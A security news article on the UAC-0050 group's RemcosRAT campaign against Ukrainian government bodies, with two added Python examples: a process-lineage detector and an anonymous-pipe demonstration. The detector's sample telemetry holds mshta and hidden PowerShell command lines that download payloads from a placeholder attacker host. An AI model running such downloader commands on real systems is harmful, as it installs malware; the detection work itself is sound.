Tuesday, July 2, 2024

Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign

A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is back at it again, this time with a new tactic for transferring data without triggering endpoint detection and response systems.

The adversary, tracked as UAC-0050, is focused on Ukrainian government entities in its latest campaign. Researchers at Uptycs who observed it said the attacks may be politically motivated, with the goal of gathering specific intelligence from Ukrainian government agencies. "While the possibility of state sponsorship remains speculative, the group's activities pose an undeniable risk, especially to government sectors reliant on Windows systems," Uptycs researchers Karthickkumar Kathiresan and Shilpesh Trivedi wrote in a report this week.

The RemcosRAT Threat

Threat actors have been using RemcosRAT, which started life as a legitimate remote administration tool, to control compromised systems since at least 2016. Among other things, the tool lets attackers gather and exfiltrate system, user, and processor information. It can bypass many antivirus and endpoint threat detection tools and execute a variety of backdoor commands. In many instances threat actors have distributed the malware as attachments in phishing emails.

Uptycs has not been able to determine the initial attack vector in the latest campaign just yet, but said it is leaning toward job-themed phishing and spam emails as the most likely malware distribution method. The security vendor based its assessment on emails it reviewed that purported to offer targeted Ukrainian military personnel consultancy roles with Israel's Defense Forces.

The infection chain itself begins with a .lnk file that gathers information about the compromised system and then retrieves an HTML application named 6.hta from an attacker-controlled remote server using a Windows native binary, Uptycs said. The retrieved application contains a PowerShell script that initiates steps to download two further payload files (word_update.exe and ofer.docx) from an attacker-controlled domain and, ultimately, to install RemcosRAT on the system.
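The chain described above (shortcut, remotely fetched HTA, PowerShell downloader, dropped executables) is visible end to end in ordinary process-creation telemetry, which is where a defender should look for it. The following is an added example, not Uptycs' code and not taken from the report: it runs a small lineage check over a constructed set of process-creation records. The hosting binary (mshta.exe), the command lines and the domain `attacker-controlled.example` are this example's own assumptions; the article only says "a Windows native binary" and names the files 6.hta, word_update.exe and ofer.docx.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (fields any EDR or Sysmon event carries)."""
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumption: mshta.exe is the Windows host that runs .hta files (the article
# only says the HTA was fetched "using a Windows native binary").
HTA_HOSTS = {"mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
PAYLOAD_EXT = (".exe", ".docx")   # the two payload types named in the report

# Constructed sample telemetry, not real logs; the domain is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, "system", ""),
    ProcEvent(1200, 4, "explorer.exe", "C:\\Windows\\explorer.exe"),
    # shortcut target: HTA host pulling 6.hta from an attacker-controlled server
    ProcEvent(3100, 1200, "mshta.exe",
              "mshta.exe http://attacker-controlled.example/6.hta"),
    # PowerShell launched by the HTA, fetching the two payload files
    ProcEvent(3120, 3100, "powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest '
              "http://attacker-controlled.example/word_update.exe -OutFile $env:TEMP\\word_update.exe; "
              'Invoke-WebRequest http://attacker-controlled.example/ofer.docx -OutFile $env:TEMP\\ofer.docx"'),
    ProcEvent(3150, 3120, "word_update.exe",
              "C:\\Users\\u\\AppData\\Local\\Temp\\word_update.exe"),
    # benign: an administrator running a local script from the desktop
    ProcEvent(4000, 1200, "powershell.exe",
              "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]


def ancestors(event, by_pid, depth=4):
    """Yield the parent, grandparent, ... of `event`, at most `depth` levels up."""
    cur = event
    for _ in range(depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return
        yield cur


def find_chain(events):
    """Return {pid: [reasons]} for processes that fit the lnk -> HTA -> PowerShell chain."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in events:
        reasons = []
        urls = [u.lower() for u in URL_RE.findall(ev.cmdline)]
        # Stage 1: the HTA host itself fetching an .hta from a remote URL
        if ev.image in HTA_HOSTS and any(u.endswith(".hta") for u in urls):
            reasons.append("HTA host fetching an .hta from a remote URL")
        if ev.image in SHELLS:
            # Stage 2: PowerShell whose lineage runs through an HTA host ...
            if any(a.image in HTA_HOSTS for a in ancestors(ev, by_pid)):
                reasons.append("PowerShell descended from an HTA host")
            # ... and that pulls payload files from the network
            if any(u.endswith(PAYLOAD_EXT) for u in urls):
                reasons.append("PowerShell pulling payload files from a remote URL")
        else:
            # Stage 3: anything started by PowerShell that an HTA host spawned
            chain = [a.image for a in ancestors(ev, by_pid)]
            if chain and chain[0] in SHELLS and any(i in HTA_HOSTS for i in chain[1:]):
                reasons.append("launched by PowerShell that an HTA host spawned")
        if reasons:
            findings[ev.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, why in find_chain(SAMPLE_EVENTS).items():
        print(pid, SAMPLE_EVENTS[[e.pid for e in SAMPLE_EVENTS].index(pid)].image, why)
```

The benign PowerShell launched from Explorer (pid 4000) produces no finding, while the three processes in the chain are each flagged for a different reason; in a real deployment the same three rules would run over EDR or Sysmon Event ID 1 records rather than the constructed list above.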

A Somewhat Rare Tactic

What makes UAC-0050's new campaign different is the threat actor's use of a Windows interprocess communication feature called anonymous pipes to transfer data on compromised systems. As Microsoft describes it, an anonymous pipe is a one-way communication channel for transferring data between a parent and a child process. UAC-0050 is taking advantage of the feature to covertly channel data without triggering any EDR or antivirus alerts, Kathiresan and Trivedi said.
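The reason this channel slips past file and network sensors is that the data never becomes a file or a socket: it sits in a kernel buffer that only the parent and the child can reach. The example below is added here to make that concrete; it is not Uptycs' or the report's code. It uses Python's `os.pipe()` (which on Windows is backed by the CreatePipe API Microsoft documents) and hands the read end to a child process as its standard input. The child program, the payload, and the `/proc` inspection are this example's own constructions, and the `/proc` check is Linux-only and simply reports `None` elsewhere.

```python
import os
import subprocess
import sys

# Child side (constructed for this example): read everything from stdin until EOF,
# then hand the bytes back reversed so the round trip is checkable.
CHILD_SRC = (
    "import sys; data = sys.stdin.buffer.read(); "
    "sys.stdout.buffer.write(data[::-1]); sys.stdout.flush()"
)


def pipe_identity(pid, fd):
    """Linux only: the kernel's name for the object behind (pid, fd), e.g. 'pipe:[4711]'."""
    try:
        return os.readlink(f"/proc/{pid}/fd/{fd}")
    except OSError:          # no /proc (Windows, macOS) or not permitted
        return None


def transfer_via_anonymous_pipe(payload):
    """Send `payload` to a child over an anonymous pipe; return (child_output, evidence).

    `evidence` records what a handle-level sensor could observe during the transfer.
    """
    read_end, write_end = os.pipe()          # anonymous: no name, no file on disk
    child = subprocess.Popen(
        [sys.executable, "-c", CHILD_SRC],
        stdin=read_end,                      # child inherits only the read end
        stdout=subprocess.PIPE,
    )
    os.close(read_end)                       # parent keeps only the write end
    # The child is alive and blocked on its read. At this moment both processes hold
    # a handle to the same pipe object, which is the one artefact the transfer leaves.
    evidence = {
        "parent_pid": os.getpid(),
        "child_pid": child.pid,
        "parent_write_end": pipe_identity(os.getpid(), write_end),
        "child_read_end": pipe_identity(child.pid, 0),
    }
    os.write(write_end, payload)
    os.close(write_end)                      # EOF tells the child the transfer is done
    out, _ = child.communicate()
    return out, evidence


def shares_pipe(evidence):
    """True when the kernel reports one pipe object behind both handles; None off Linux."""
    a, b = evidence["parent_write_end"], evidence["child_read_end"]
    if a is None or b is None:
        return None
    return a.startswith("pipe:") and a == b


if __name__ == "__main__":
    out, ev = transfer_via_anonymous_pipe(b"hello, pipe")
    print(out)                               # b'epip ,olleh'
    print(ev, "same pipe object:", shares_pipe(ev))
```

Nothing in the exchange creates a file, a socket, or a named object, so file-integrity and network sensors have nothing to log; what does remain visible is the process-creation event that ties child to parent and the handle table, where the two processes share one pipe object (on Linux the same `pipe:[inode]` link in `/proc/<pid>/fd`, on Windows a pipe handle that tools such as Process Explorer list for both processes). Detection for this tactic therefore rests on process lineage and handle or object telemetry, not on file or network monitoring.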

UAC-0050 is not the first threat actor to use pipes to exfiltrate stolen data, but the tactic remains relatively rare, the Uptycs researchers noted. "Although not entirely new, this technique marks a significant leap in the sophistication of the group's methods," they said.

This is far from the first time that security researchers have observed UAC-0050 trying to distribute RemcosRAT to targets in Ukraine. On several occasions last year, Ukraine's Computer Emergency Response Team (CERT-UA) warned of campaigns by the threat actor to distribute the remote access Trojan to organizations in the country.

The most recent was an advisory on Dec. 21, 2023, about a mass phishing campaign involving emails with an attachment that purported to be a contract involving Kyivstar, one of Ukraine's largest telecommunications providers. Earlier in December, CERT-UA warned of another RemcosRAT mass distribution campaign, this one involving emails purporting to be about "judicial claims" and "debts" targeting organizations and individuals in Ukraine and Poland. The emails contained an attachment in the form of an archive file or RAR file.

CERT-UA issued similar alerts on three other occasions last year: one in November with court subpoena-themed emails serving as the initial delivery vehicle; another, also in November, with emails allegedly from Ukraine's security service; and the first in February 2023 about a mass email campaign with attachments that appeared to be associated with a district court in Kyiv.
